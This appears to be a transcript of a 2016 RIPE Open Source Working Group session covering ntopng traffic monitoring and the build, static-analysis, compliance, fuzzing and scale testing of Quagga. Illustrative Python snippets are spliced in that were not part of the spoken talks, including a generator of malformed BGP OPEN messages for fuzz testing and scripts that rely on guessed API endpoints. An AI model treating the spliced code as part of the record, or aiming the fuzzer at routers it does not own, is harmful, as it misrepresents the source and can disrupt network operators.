Archives

Open Source Working Group session
26 May 2016
11 a.m.


CHAIR: Good morning. Sorry we are a little bit late, the previous Working Group wanted to have an extra half an hour, and they promised they will get a watch for the next time.

Welcome to the Open Source Working Group. As somebody already noticed, our slides are missing; we had some copy and paste error from the test systems, sorry about that, but this is RIPE 72 if you are not sure, and you are in Copenhagen.

Okay. To start. We have quite a full agenda again. I hope you are happy from the talks. So, first of all, from the administrative part, we have a nice scribe again over there who basically got selected, or maybe volunteered, thank you anyway, I'm not sure that we have anybody who is watching the chat ‑‑ okay, perfect, so if you are watching it online, get online if you have questions so you can ask questions back there. The previous minutes, I do believe they were sent out to the mailing list. If not, they are definitely on the website ‑‑ they should be there, if not, then blame us for it, then it's our fault. We don't want to blame the persons who wrote the minutes, so it would be our fault, but I believe they should be there. If anyone has any comments on that, I assume not.
So, let's start with the talks. I'll hand it over to Andrei.



ONDREJ FILIP: Thank you very much. We have a lot of very interesting talks and also two lightning talks at the end of the session, so I will not delay it and I will start by inviting to the stage Luca Deri. I presume you are speaking alone. Luca is going to speak about high speed network traffic monitoring.


LUCA DERI: Good morning. My talk will be about the next generation ntop that we have started to develop a couple of years ago. In this session you will hear a bit about the project and what it is about. If you want to know more, we'll be running a tutorial in room number 2 at 3:00pm, so you can ask questions and have a more detailed introduction.

So, what is ntop? It is a small company that is doing basically Open Source network traffic monitoring. We started in 1998 with the first, original version of ntop and we are now continuing along that line. Over the years we had to face challenges such as high speed packet capture to analyse traffic, so we developed other tools such as drivers for 10, 40 and 100 gigabit Intel network cards, the deep packet inspection Open Source library nDPI, and so on. In essence we are creating an ecosystem that is functional for monitoring networks at very high speed.

Our approach to network monitoring is different from what many vendors do. In essence, when we started years ago, network monitoring was very expensive. In a way it's still expensive, but not as expensive as it used to be. What we wanted to do was analyse traffic. We couldn't rely just on SNMP, so we started to play with packets, to analyse them and to see what was happening with them, to troubleshoot the networks, to understand the issues and to improve them. We believe that without measuring traffic you cannot tell whether what you planned to implement is really happening in the network. So this is the whole idea. We don't want to be locked in by vendors. We want to be independent from vendors, try to support standards like sFlow and NetFlow, but at the same time be free to innovate without waiting for vendors to implement information elements in their machines.

Just to give you an overview of what we are doing, because we are at the Open Source Working Group: our tools are divided into two categories. We have some commercial ones and some free ones, and the commercial ones allow us to survive. The main problem with Open Source is that many people are using the tools but not many are willing to support them. And so we have the feeling that for many people Open Source means just free. They don't care about the source. People actually don't even use the source most of the time. A very small portion of the community perceives the source as a value. So, let's say, we are providing people free tools. Unfortunately this means that most of the time the most we can expect is just feedback or bug reports. It's a little bit poor, because support in terms of code contributions would be desirable.

And at the same time, like I said, we cannot really survive with pure Open Source tools, because the donations we received last year were negligible, just to give you an example. So we have decided to create premium versions on top of the Open Source tools: like I have said, this afternoon we will be introducing a tool, more traffic visibility tools, DDoS mitigation software, things like that. At the same time we have decided that, because we are coming from the free Internet community, we have to reward the people in our community, so we are charging only for the commercial tools; ntopng itself stays free. So this is our way of doing it: the free tools also live on, thanks to those that buy the commercial versions.

In terms of coding, if you are interested: everything we do is on GitHub. That was a decision we made last year, because for years we were using a private SVN and we thought that GitHub was important, not just because of GitHub per se, but because today if you are not on GitHub you basically don't exist. You might like it or not, but this is the conclusion we reached. So we decided to go there. The transition was pretty smooth and we believe it was a good move.

Also because we have other tools like Travis that come for free and do continuous testing, so the quality has improved, and the way GitHub works allows people to give us contributions. In particular, we receive contributions for the packet inspection Open Source library, which I will go through later, more than for ntopng, because with network people we have the feeling they are using the tools but they are not extending them and contributing, because most of the time coding is not part of their culture, whereas those who use libraries are coders. So they are more interested in contributing code, for instance support for the protocols they are interested in.

So, back to our topic. Some history. In 1998 I started ntop, the original one. As you can see from the screen, it is part of history now; it was using things that were very interesting in those days but that are now very outdated. For instance, this was the web GUI available then. At some point we decided to start over because enough had changed: HTML is different, you have JavaScript and other things, so it was time to give a fresh start to this project. Also because the protocols have changed: the protocols of those days have disappeared, so we had to focus on different aspects.

So, therefore we wanted to create a new software able to scale, first of all at least to 10 gigabit; to be open to extension; to be scriptable, so that users can extend it and fetch data from the application itself. ntopng has a web GUI, but this does not mean that you have to use it; you can perceive it as a server. You put it on your network, it is grabbing flows or analysing packets and that's it, so it's a sort of database. And out of it you can extract the data to create your own reports, or use the embedded web interface. It's a source of data, yet another source of data. And these days, with open data formats, it's just a data source, period. There is nothing magic in packets any more, whereas in the past there used to be the BGP expert, the NetFlow expert and so on. Now it's just pure data that you have to integrate with your infrastructure. If you have SNMP, NetFlow, other types of information, logs, everything can go into the same system.
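
As a rough sketch of the "ntopng as a data source" idea, the snippet below pulls host data out of a running instance over HTTP and prints a few fields. The port, endpoint path and JSON field names are assumptions for illustration only; the actual REST/Lua endpoints depend on the ntopng version you run.

```python
# Minimal sketch: pulling host data out of a running ntopng instance over HTTP.
# The endpoint path and JSON layout below are assumptions for illustration,
# not the documented ntopng API; check your ntopng version for the real paths.
import json
import urllib.request

NTOPNG_URL = "http://127.0.0.1:3000"          # default ntopng web port (assumption)
ENDPOINT = "/lua/rest/get/host/active.lua"    # hypothetical endpoint path

def fetch_active_hosts(base_url: str) -> list:
    """Fetch the list of active hosts as JSON and return it as Python objects."""
    with urllib.request.urlopen(base_url + ENDPOINT) as resp:
        return json.loads(resp.read().decode("utf-8"))

if __name__ == "__main__":
    for host in fetch_active_hosts(NTOPNG_URL):
        # Field names are illustrative only.
        print(host.get("ip"), host.get("bytes_sent"), host.get("bytes_rcvd"))
```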

So what is ntopng doing? First of all it's a tool for monitoring the quality of experience and of service. That's important. It's designed for companies, so it's probably a little bit borderline for RIPE, I mean for people that are mostly interested in BGP based information. But it gives you an idea of what is happening on your network in realtime. There is no delay, no averaged numbers, unlike NetFlow. Everything happens in realtime in the web interface. It has been designed from scratch, like I said, based on the principle that the engine is separated from the web interface. The web interface is written in Lua, the engine is written in C++. The engine must survive attacks, so they won't crash it; this is an important thing we have implemented. It must also survive people clicking around on the web GUI. Essentially it's divided into two layers: the engine is C++, and the Lua part allows you to render data on your screen and to export data to other systems.

The monitoring engine has three main concepts. The interface: for ntopng an interface is not just a physical interface from which you are seeing packets; you can also receive flows from the outside, for instance from a NetFlow router, so that is an example of a collector interface. Then the concept of host: for all the hosts that are seen on an interface we can display the information and the flows that belong to that host. And of course the concept of flow.

Ntopng divides hosts into two different categories: local and remote. Local means that those hosts are important for us because they belong to our infrastructure, so we want to keep statistics for those hosts, mostly per-host statistics; we want to know more about them. Remote means that they are other hosts that do not belong to our domain and that contact us. Let's say we go to Facebook: we don't want to keep statistics on Facebook, we want to keep statistics on the hosts going to Facebook. This is the main distinction. And because everything is dynamic, similar to what happens in a flow cache, ntopng implements the same thing, a lifecycle: basically, when a host is idle for a little bit of time it is purged from memory, and the same happens for flows. When it's purged, it is written to a database if you are interested.
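
A minimal sketch of that purge lifecycle: entries that stay idle longer than a timeout are dropped from memory and handed to a persistence callback. This is an illustration of the concept, not ntopng's actual C++ code, and the timeout value is an arbitrary assumption.

```python
# Conceptual sketch of the purge lifecycle described above: hosts/flows that stay
# idle longer than a timeout are removed from memory (and could be written to a
# database at that point). This is an illustration, not ntopng's actual code.
import time

IDLE_TIMEOUT = 300  # seconds of inactivity before an entry is purged (assumption)

class FlowCache:
    def __init__(self):
        self.entries = {}          # key -> (stats, last_seen)

    def update(self, key, nbytes):
        stats, _ = self.entries.get(key, ({"bytes": 0}, 0))
        stats["bytes"] += nbytes
        self.entries[key] = (stats, time.time())

    def purge_idle(self, persist):
        now = time.time()
        idle = [k for k, (_, seen) in self.entries.items() if now - seen > IDLE_TIMEOUT]
        for key in idle:
            stats, _ = self.entries.pop(key)
            persist(key, stats)    # e.g. write the purged entry to a database

cache = FlowCache()
cache.update(("10.0.0.1", "192.0.2.7", 443), 1500)
cache.purge_idle(lambda k, s: print("purged", k, s))
```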

Like I have said before, in addition to pure packet processing, we have created an Open Source library for deep packet inspection, based on an existing, no longer maintained library called OpenDPI. Some people are kind of scared of inspecting the packet payload. We don't want to inspect those packets to spy on people; we want to do it to characterise traffic. This is very important. Today you cannot really rely on ports to identify protocols, because they are no longer really meaningful. HTTP doesn't mean TCP port 80, at least in our understanding. Therefore we decided it was time to create a free and open DPI toolkit. And because this is analysing packet payload, Open Source here is very important, because you can inspect what's going on. You cannot simply assume that the devices made by companies that are looking at your traffic payload are doing that properly. At least this was our understanding.
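
To illustrate why ports alone are not enough, here is a toy, port-independent classifier that looks at payload signatures instead. Real DPI such as nDPI covers hundreds of protocols with far more state, so treat this purely as a conceptual sketch; the three patterns below are just textbook examples.

```python
# Rough illustration of port-independent classification: instead of trusting
# the TCP port, look at the first bytes of the payload for well-known protocol
# signatures. Real DPI (nDPI) goes much deeper; these are toy examples only.
def classify_payload(payload: bytes) -> str:
    if payload.startswith((b"GET ", b"POST ", b"HEAD ", b"PUT ")):
        return "HTTP"
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03:
        return "TLS"                      # TLS handshake record, any version
    if payload.startswith(b"\x13BitTorrent protocol"):
        return "BitTorrent"
    return "unknown"

# HTTP running on a non-standard port is still recognised as HTTP.
print(classify_payload(b"GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n"))
print(classify_payload(b"\x16\x03\x01\x02\x00\x01"))  # TLS handshake record header
```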

So that's nDPI, another library you can find on GitHub, used by ntopng; it's Open Source, GPLv3. We support all the modern protocols, not just the simple ones but even the complicated ones, the protocols that keep changing. Basically, it is able to categorise traffic and report limited metadata to us. When I say limited, I mean what is meaningful for network monitoring. If you have SSL, it gives us the SSL host name, which is part of the certificate; if you have BitTorrent, it gives us the hash, so you can figure out what type of activities people are doing. But it is not designed at all for extracting metadata like e-mail source and destination, so it's not at all a lawful interception kind of tool. It is used only for traffic visibility, to characterise traffic.

As you can see, in ntopng we have this user interface that displays traffic in realtime. It allows people to scroll, to drill down, to see what protocols are in use and what type of activities these people are carrying on, which is usually not possible with standard NetFlow tools unless you have augmented flows.

As you can see, we have historical support; we can store historical data as an optional feature. Everything you see here is doable from the web interface. It is simple to extract PCAPs: if for a specific host you need a PCAP, you can request it from the web interface, and using this you can extract the PCAP belonging to the flow that you have seen.

In the ntopng dashboard you can see the activities, and everything you see is a hyperlink, so clicking on a host or a flow allows you to drill down and see extra information. This is an example of a flow. As you can see, on the flow you don't see just bytes and packets; you are able to characterise the network latency or the application latency, so how the application is reacting to people's requests. You can see, for instance, the inter-packet delay, for learning about flows that are idle, which might mean that some kind of attack or this type of activity is happening on your network.

And the same for the host view. We also characterise all the traffic of a host into a single consistent view. We have the ability to look at historical traffic. If you start ntopng saying, okay, save historical data to a database, you can see what has happened. You can drill down, you can see top talkers, top flows, anything you are interested in should really be possible.

So just to conclude.

If you are interested in testing our tool, you have two options. One is to get the code on GitHub: you download it and compile it yourself. Another option is to use a binary package. Ntopng is part of Linux distributions like Ubuntu, and it is also possible for you to use the packages that we are building every night at packages.ntop.org; you can download them and install them with your package manager, and these are the latest builds. And if instead you are using Docker, which has the ability to run software in a very simple way, we also provide an image you can use for that.

If you are interested, this afternoon we are running a two hour session in the second room, which is over there. If you want to see what's happening, if you want to help us discuss the road map and provide feedback for future work items, you are really welcome. We invite you to be there this afternoon. Thank you very much.

CHAIR: Thank you

AUDIENCE SPEAKER: Alex, speaking for myself. Do you support ERSPAN?

LUCA DERI: You mean receiving encapsulated packets?

AUDIENCE SPEAKER: Over GRE?

LUCA DERI: I think we support it on the probe, not in ntopng. This is interesting; we can definitely support it, we just have to back port the code. A simple addition.

AUDIENCE SPEAKER: I think it's a very important case.

LUCA DERI: Can you open an issue on GitHub so we can do that. Thank you.

AUDIENCE SPEAKER: Hello, Constance. Hi Luca, I have been familiar with your work for many, many years. My main question is: from what I understand, for the low level stuff you bypass the kernel and you process packets in user space with this so-called PF_RING infrastructure of yours. First, are you dependent on some sort of driver, or can you use any network card? And what kind of performance, packets per second or bandwidth, are you able to process currently?

LUCA DERI: You have two options. One is the kernel module that sits on top of Linux and can give you the ability to analyse a couple of million packets per second. If you want extreme speed you have to use our own drivers; we have drivers for Intel cards, 1, 10, 40 and 100 gigabit. For instance, a couple of weeks ago we released the driver for Intel 100G. It's good. So you can virtualise the card, you can handle 60 million packets per second capturing, you can have multiple queues, you can really scale up. The point is that ntopng, per interface, is able to handle about 4 to 5 million packets per second, because we are building flows out of the packets, but we know people that are sending us sFlow or NetFlow who are able to handle 100 gigabit, especially for Internet exchange points. It depends on whether you are pre-processing traffic somewhere or whether you want to process everything inside ntopng.

AUDIENCE SPEAKER: Philippe from NetAssist. I have a question about the structure of ntopng: how it works with multi-card systems, how it scales on the cores and how it scales horizontally.



LUCA DERI: In ntopng we have one interface and one core; you have to allocate one core per interface, and if the interface is too fast you have to virtualise it with RSS. It means that in ntopng you create one thread per interface, and you have the concept of an interface view that allows you to merge those interfaces into one single one. Ntopng is not designed for handling a huge network by itself unless you pre-process the traffic. That is the way we scale.

AUDIENCE SPEAKER: We need to talk in private a little. It may be done. I can help with this.

ONDREJ FILIP: Thank you very much, Luca. The next speaker is a co-chair of this session, Martin Winter. If you know Martin, he is going to talk about testing of Open Source routing implementations; even very late at night he is ready for such a talk, so I think he is the best person to deliver a talk about this topic. So, please.

MARTIN WINTER: Welcome everyone. I want to talk a little bit about some ideas we have on how we test a routing protocol and the challenges we face there. I'm using Quagga as an example because that's what I'm working on, but a lot of these things may apply to any other routing stack, especially the Open Source community ones, so it could be used for any of the other routing stacks too, and some of the things may even be hints if you test commercial routers, some ideas of what you can do.

I think I can probably skip that one. Just Open Source Routing: we are part of NetDEF, basically, which is the company I work for, a non-profit, so we basically do the Open Source Routing project, mainly working on Quagga.

So, before I even go into the specific test tools, I want to talk a little bit about the build tooling, because especially if you work in Open Source, a lot of things also come from compiling; you can find some really cool errors and issues there too.

So, as an overview example: when I build Quagga, I normally don't just build on a single Linux; I basically decided to build it on all the different Linux distributions. So I have build systems working with CentOS, Ubuntu 14.04, 16.04, all of these here. The thing is, they have different versions of the libraries that they use, so I want to make sure everything links against those, and sometimes you end up with something that isn't compatible, and it's important to notice this as early as possible.

I'm also doing all of that in virtual machines. The main advantage is easy snapshots: when you build, you can install on it, and at the end you say, okay I'm done, I take the packages off and then I go and reset the whole machine back to the beginning. One key thing there is the security aspect, because my system kicks in automatically for anyone who submits code; it will build it, and I'm slightly worried there might be something bad in there too. It helps me that at least everything gets cleaned out again after each build.

Different CPU architectures: I would say it's great if you have the resources. I would love to do that too, but I'm already running about 14 different versions of machines for building in parallel, so for now resources are a big limit and I'm not doing it. But if you support different architectures it would be very useful sometimes to build and test on big endian and little endian systems specifically.

Next to the build, something which I hope you are doing is static analysis; there are a few different products out there. I really like Clang, which is part of the LLVM project; there is basically a build analyser tool included in there, and the key thing is it generates linked HTML web pages. This is an example output of one of these. It gives a summary of what issues it found. The cool thing is, it's free. You can run it as many times as you want. You can download a report and archive it; for every run I archive all these web pages.

The challenge with this specific static analyser is that if you mainly want to track what changes from one version to another, it makes that very difficult. You probably never get to zero errors or zero warnings, because it unfortunately finds quite a few false positives and tags a few things as an error which may not be one. So you basically end up having to find a way to parse the output. In my case, when somebody submits a patch I want to make a diff on that output and tell them: great, thank you, you fixed one of these warnings; or: there is another warning here, maybe you can go back to this URL, look at it and see whether these are valid concerns or not.
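
A small sketch of that diff-between-runs idea, assuming the analyser warnings have already been extracted into plain one-line strings; parsing the HTML report itself is not shown, and the file names are made up.

```python
# Sketch of the "diff between runs" idea: compare the analyser warnings from the
# baseline build with the warnings after a patch and report what appeared or
# disappeared. Assumes warnings were already extracted into one-line strings
# (file:line: message); extracting them from the HTML output is not shown here.
def load_warnings(path: str) -> set:
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

def diff_warnings(baseline_file: str, patched_file: str):
    before = load_warnings(baseline_file)
    after = load_warnings(patched_file)
    return sorted(after - before), sorted(before - after)   # (new, fixed)

if __name__ == "__main__":
    new, fixed = diff_warnings("warnings_master.txt", "warnings_patch.txt")
    for w in new:
        print("NEW WARNING:", w)
    for w in fixed:
        print("FIXED:", w)
```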

One of the things which you may find a bit annoying is that there are quite a few bad warnings. There is a classic example. You see a loop: it checks the pointer for NULL, it does something with it, it frees it, and then on the next line the analyser says, oh hold on, that pointer is now invalid because it was freed. However, if you look at the loop, it will verify that again, so it should be perfectly fine. So there are things where you have to think a little bit and you may not be happy. That's the disadvantage, basically, but it finds valid errors and we have found a few issues already.

Another one which is quite common and well known is Coverity Scan. If you have an Open Source project, it gets reviewed; if it's on GitHub specifically, they check the licence and approve it, and it's free for you; for commercial products you have to pay for it. They have a nice web interface. It's basically a service which they run: you build some compile files, you upload them and they run the analysis. And it gives you output like this, with a summary. I have to say it has far fewer warnings, and most of the findings are much more valid. I kind of like it. It finds different things, so don't choose just one of them; I really recommend doing both.

The challenge is that, depending on your code size, you can run it maybe between one and ten times per week, so if you have a lot of submissions you may not be able to run it for every single submission. The other thing is that when you want to look at the bugs, the user needs to go to that web page and log in. If you have an Open Source project you want to keep it open, but every single user who wants to look at the results has to be approved by a moderator to get access and has to log in. You can't make it open for everyone to look at.

It also has a nice feature in that it gives you an ID for each bug, which is nice for your tracking. But again, the problem with the web interface is that you can't easily extract the data. It's not like Clang, where you can take all the pages and archive them; here you have to log into their service.

This is a really fun one, where I was really surprised at what they can do. You see a classic, typical copy and paste error: it noticed that there are two code blocks which are the same, and says that the one below probably shouldn't be the IPv6 one, maybe it should be the non-IPv6 one, because that would make more sense. And I have to say I was very impressed that it can actually find things like this.

Another thing, which is kind of an open question: code coverage. Obviously I'm not doing it yet. There are a lot of discussions. If you are doing code coverage testing, I would appreciate you approaching me later; I want to see how many things you find. I'm not really sure whether the extra work is worth it. It obviously has to be done at some time, but it's sometimes a bit challenging to track together with the package builds and everything.

So, now back to the testing tools. One of the reasons I was inspired to give this talk is that I hear so many people, for example with BIRD and GoBGP and others, doing interesting testing, but most of it is interoperability testing. So you take a router, the implementation, you connect it to some Cisco and Juniper and it works, so it must be good. Sorry, it's not; it's probably a good starting point, but you are missing out on a lot of the test cases. The key thing, as you are probably all familiar with: in BGP there are transitive attributes which, if an implementation doesn't understand them, it has to forward. So your box in a real network can receive attributes from far corners of the network which it doesn't understand and may have an issue with, but your Cisco and Juniper may just pass them along. There are a lot of error cases which you will probably have a hard time reproducing, because your implementation shouldn't produce or send out bad updates, and the same for Juniper and Cisco: they will do their best not to send them, but you are still supposed to handle them according to the standards. Some packets, based on the RFC, you have to accept, correct and process; for some of them you have to accept, correct and send out corrected updates when you forward; some of them you have to ignore; and for some of them you have to close the session. These are test cases which are very difficult, and every time you see large outages because somebody sends something weird across the Internet, these are the things you would have a hard time catching just with interoperability testing.
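
The transitive-attribute behaviour mentioned above can be illustrated with the path attribute flag bits from RFC 4271; the little sketch below shows the three outcomes for an attribute the implementation does not recognise.

```python
# Small illustration of the transitive-attribute point above, based on the BGP
# path attribute flag bits defined in RFC 4271: an implementation that does not
# recognise an optional transitive attribute still has to pass it on (with the
# Partial bit set), so malformed data can travel far across the network.
OPTIONAL   = 0x80
TRANSITIVE = 0x40
PARTIAL    = 0x20

def handle_unknown_attribute(flags: int) -> str:
    if not flags & OPTIONAL:
        # Unrecognised well-known attribute: this is an error condition.
        return "error: unrecognised well-known attribute"
    if flags & TRANSITIVE:
        # Must be forwarded to peers even though we do not understand it.
        return "forward unchanged, set Partial bit (flags -> 0x%02x)" % (flags | PARTIAL)
    # Optional non-transitive and unrecognised: quietly ignore it.
    return "ignore"

for f in (0x40, 0xC0, 0x80):
    print(hex(f), "->", handle_unknown_attribute(f))
```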

What we use is a commercial tool, Ixia ANVL. It has a big disadvantage: a very high price tag. The problem is that there are unfortunately no real Open Source tools out there for compliance testing, basically nothing at all. It's such a small market, even for commercial tools, that they end up at a very high cost; the market is basically a few equipment manufacturers and nobody else. So it is very challenging to find an Open Source solution for compliance testing. We use a commercial tool, so we had to bite the bullet and buy something there.

The nice thing about it is that it doesn't just test compliance, because of the way it runs: it basically figures out the specific topology for each test, like one chapter of the RFC, then it configures your DUT over the normal interface, in the case of Quagga its CLI, and then reconfigures it for the next test. I find a lot of issues too when people accidentally break the CLI, because it exercises all the configuration for all these weird corner cases too. In our case we run about two and a half thousand tests. The other disadvantage is that it takes a long time, multiple days for a full run, so we basically parallelise some of these things to try to make it faster.

Another thing we do is protocol fuzzing. If you are not familiar with what that does: looking at the protocol, here for example a BGP OPEN message, the protocol fuzzer knows the routing protocols, it knows basically which values are correct and incorrect, so it has the know-how. It goes in there and tries, for example, the version: what happens if I don't have version 4 in my OPEN message, what happens then? And it tries all the weird values: it tries very low values like 0, it may try something like minus 200, it may try the maximum value and a few random values in between. It may skip optional fields. It may create packets where the length says the packet is much longer but it's actually a short, truncated packet, and it goes through all of these things. And then it checks the router: yes, it may kill the BGP session or disconnect it, but the router, your test router, should be reachable afterwards. When you bring up a new session, it should open up and work. There shouldn't be a hang, a crash, or performance becoming very, very slow.
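
As a sketch of what such a fuzzer does, the snippet below builds a syntactically valid BGP OPEN message (wire format per RFC 4271) and then emits variants with boundary values in the Version field. A real fuzzer mutates every field, the lengths and the optional parameters as well; the value list here is only an example.

```python
# Sketch of the fuzzing idea described above: build a valid BGP OPEN message,
# then emit variants with boundary values in the Version field.
import struct

def bgp_open(version=4, my_as=65000, hold_time=180, bgp_id="192.0.2.1"):
    body = struct.pack("!BHH4sB",
                       version,
                       my_as,
                       hold_time,
                       bytes(int(o) for o in bgp_id.split(".")),
                       0)                      # no optional parameters
    header = b"\xff" * 16 + struct.pack("!HB", 19 + len(body), 1)  # type 1 = OPEN
    return header + body

def fuzz_version_field():
    for version in (0, 1, 3, 5, 6, 127, 255):   # everything except the valid 4
        yield version, bgp_open(version=version)

for v, msg in fuzz_version_field():
    print("version", v, "->", msg.hex())
```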

We are again using a commercial tool here; there are a few Open Source fuzzers out there. The challenge is that you spend a lot of time defining the protocol: the Open Source fuzzers do not understand routing protocols, so you basically have to go into the configuration and define the routing protocols, how the packets look, to get something better than completely random. If you just do completely random packets you have a fuzzer, but it may take way more time to find anything, so we use these fancier test tools too. We don't publish the results, because if they pass it's boring, and if they don't pass it's most likely a security issue and we spend the time fixing it.

The other thing, obviously, is performance. If you are talking about a routing protocol, the forwarding doesn't matter to me that much; that's outside of Quagga, outside of something like BIRD. But the routing performance, the scale, matters: what scale can I get to? This is a simple test case I have for OSPF: I want to know what happens, how many routes can I handle? This one is for external routes, so I have a simulated OSPF router announcing external routes, and I have two DUTs. If you are wondering why I have two: because I want to test announcing and receiving basically at the same time, so it's just a shortcut; if I just had one, I may not see from the announcements whether forwarding them on all works too. The second thing is that I test with traffic. I won't go into the router, do "show ip route" or something like that, and count the routes and verify them; that may drag down the user interface a lot and may cause other effects. And it's also not what you care about in the end: you care about when the route is actually in the forwarding path.

So, things like that look simple, and then you may end up with some more surprising results. Here you see three lines; the green one is for OSPF and the orange one is for IS-IS. I have to say that's an old version of Quagga; I just show it because of the interesting random surprises. You expect a nice steady line going up to the maximum it can handle. Here you see, on the green line, up to about 2,000 routes everything looked fine, and then suddenly, above 2,000 routes, every time I announced more routes there was some delay. It looks like a classic case of something you may want to look at: allocations, buffer cleanup, or some bug in there. You can also see that at that time I got to about five and a half thousand OSPF routes and something above two thousand IS-IS routes. So that was an interesting thing. Again, this is an old slide, but you will be surprised: even if you take a commercial router, you will quite frequently not get what you expect. Have fun if you try that.

And have fun with the vendor trying to explain why.

The same thing obviously for OSPF with internal routes. I did a similar thing; it takes a bit more calculation than the external routes. I simulated a matrix: I wanted to see, if I have a 10x10 router matrix, what happens, and then 20x20, and go up and see where things just completely fail. This is how it looked in a good case. A 20x20 matrix gets to about 800 routes; I tested routes to every single interconnection link there. You can see that in the first 15 seconds not much happened; there were the handshakes going on. Then most of the routes came in, slightly later the rest of the routes came in, and all was fine. So that was a bit more than 30 seconds.

Then I said, let's see what happens if I go a bit bigger, about 50 by 50. And that's how it looked. It took a bit more thinking, and then the whole thing got pushed down, but you see it didn't really reach the green line, which is what I expected. It was sitting there for some time, not doing much; it looked all right, and then suddenly, about a minute later, everything disappeared from the forwarding again. And another half a minute later it came back. Obviously these are the bugs you want to look for, and the challenge is that to find them you cannot just look at how long the whole thing takes in total; you have to look at how it learns the routes, how it looks in a graph.

The challenge is basically how you summarise it. There isn't a simple pass/fail, so it's very difficult to describe the results somehow if you do an automated test. Also keep in mind, with virtual machines, make sure you know the performance, that your hypervisor isn't overloaded, and that you get reliable performance if it is a virtual machine.

Tools for testing: for BGP, I can highly recommend ExaBGP. It has good ways to check routes for verification. For OSPF/IS-IS we are using traffic generators for most of these things. If you are into this and want to build something, I would highly welcome you to do so.
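
For a flavour of how ExaBGP can be used for this kind of scale testing, here is a sketch of an announcement script using ExaBGP's text API (a helper process that prints "announce route ..." commands on stdout). The prefix count, pacing and the surrounding exabgp.conf wiring are assumptions for your own setup.

```python
#!/usr/bin/env python3
# Sketch of an ExaBGP "process" script for scale testing: announce a batch of
# test routes by printing ExaBGP API commands on stdout. Prefix count, pacing
# and the neighbour configuration are assumptions; wire this into exabgp.conf
# as an API process for your own environment.
import sys
import time
from ipaddress import ip_network

BASE = ip_network("10.128.0.0/9")
NEXT_HOP = "192.0.2.1"
COUNT = 5000          # number of /24s to announce (adjust to your test)

def main():
    for i, net in enumerate(BASE.subnets(new_prefix=24)):
        if i >= COUNT:
            break
        sys.stdout.write(f"announce route {net} next-hop {NEXT_HOP}\n")
        sys.stdout.flush()
        if i % 500 == 0:
            time.sleep(0.1)   # simple pacing so the peer is not flooded at once
    # Keep the process alive so ExaBGP does not withdraw the routes.
    while True:
        time.sleep(60)

if __name__ == "__main__":
    main()
```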

Obviously, don't forget: everything in these tests you want to automate, especially if you are in Open Source. You are not a large company like Cisco, you basically don't have the manpower, so everything needs to be fully automated. And don't forget the result parsing. If I just build things on a system, a normal contributor to the project will not read it, they will not go to a web page. So what I have is basically everything automated, from picking up the patch from the mailing list down to, at the end, creating an e-mail back to the user saying: thank you, everything looks fine; or: hey, it failed compiling here in these areas, or it failed to compile on this Ubuntu version, and here is the snippet from the output which is relevant.
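
A rough sketch of that result-parsing step, assuming the build log is a plain text file and the surrounding patch pick-up and mailing machinery already exists; the error patterns and file names are illustrative only.

```python
# Sketch of the "result parsing" step: scan a build log for error lines and
# build a short report that could be mailed back to the contributor. The log
# format and the rest of the patch-handling pipeline are assumptions.
import re

def extract_errors(log_path: str, context: int = 2, limit: int = 20) -> list:
    with open(log_path) as f:
        lines = f.readlines()
    snippets = []
    for i, line in enumerate(lines):
        if re.search(r"\b(error|undefined reference)\b", line, re.IGNORECASE):
            snippets.append("".join(lines[max(0, i - context):i + context + 1]))
            if len(snippets) >= limit:
                break
    return snippets

def build_report(platform: str, log_path: str) -> str:
    errors = extract_errors(log_path)
    if not errors:
        return f"{platform}: build OK"
    return f"{platform}: build FAILED\n\n" + "\n---\n".join(errors)

print(build_report("Ubuntu 16.04", "build.log"))
```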

A few more links if you are interested. I'll leave them in the slide. You can look at it, especially at the bottom there is a white paper which gives way more details.

And that's basically it.

ONDREJ FILIP: Are there any questions?

MARTIN WINTER: If you are doing any testing on routing protocols, please ping me because there seems to be a very small community. I would like to get some feedback, experience, exchange stuff.

ONDREJ FILIP: I have one question Martin actually. You know, we are also thinking about testing the way you are doing that, and my question is, how much money did you spend on those commercial tools, roughly?

MARTIN WINTER: Sorry, I didn't get ‑‑

ONDREJ FILIP: How much money did you spend on that commercial equipment? Is there an Open Source programme, or do you have to pay the normal price?

MARTIN WINTER: I see a huge value in it. Obviously you have limited resources; I would love to use Open Source tools, but the problem is that when things just don't exist, I unfortunately do not have the resources to start developing them on my own, because then my project wouldn't be Quagga, my project would be writing test tools. So it helps a lot. Especially if you are a non-profit in the US, sometimes some of these vendors are very nice to you and may even donate things, so that helps too. The challenge is really that there is not much out there, but I would really love to see more, like non-profit or private efforts there too. And there is more for BGP; if you want to test BGP it's much easier, but if you have to test things like IS-IS or OSPF it's very challenging.

ONDREJ FILIP: Okay. Any other question? I see one.

AUDIENCE SPEAKER: Martin Levy at CloudFlare, and thank you for doing all this work over quite a few years. Could you give us a sort of high level, holistic view of how different Quagga is today versus when you started, and how these automated tools have hopefully accelerated the changes to this code base? It's a code base we have all known for a long time.

MARTIN WINTER: So, the impact of it: basically, the best results I get so far are out of the compliance tests and also from the building on the different platforms. When we started, Quagga normally built perfectly fine on Ubuntu, but I know that in the beginning it was quite some pain to get things building again on all the other distributions. Now, because anyone who submits something to the Quagga community gets an e-mail report back within an hour that tells them immediately if things are broken, that helps a lot. I noticed that if contributors get feedback within a short time, they are extremely likely to fix it and resubmit, and that happens before anyone even manually code reviews it and spends time on it. The second thing is compliance. I notice all the time, obviously, that things break, and I'm quite good at finding issues there. Compliance test reporting is obviously a big challenge, because it's sometimes not that clear; the RFCs are not a simple binary yes or no, correct or not, they are sometimes quite open to interpretation.

AUDIENCE SPEAKER: Gert Döring, with my Open Source hat on. I'm active in the OpenVPN project, and what you describe is pretty much what we do as well. We have a build farm with all the different BSDs, Linuxes, Solaris, and every time something is committed it gets built and tested on all these platforms, because we look at the patch, we review it, everything looks fine and it works on Linux, and then all the BSDs explode, because some of these routing table interactions, which OpenVPN has to do as well, are just highly system specific. So, yes, this is good stuff.

MARTIN WINTER: You also have to keep in mind that you can probably not expect every contributor to have access to every machine.

GERT DÖRING: No, they don't. They have their machines, and if they are really willing, they test it on three different platforms and the fourth one explodes. So this is not malice or negligence on the side of the contributors; there are just too many different operating systems supported, and we don't even support all the stuff, just the mainstream stuff.

MARTIN WINTER: And you would be quite surprised at the difference between different versions of Ubuntu, for example; just from package changes things frequently break too, so don't test just one version of it.

GERT DÖRING: Then of course the actual traffic flow through the test system is something that is surprisingly hard to test, to actually set up a virtual network and push packets through. So what you described is quite interesting.

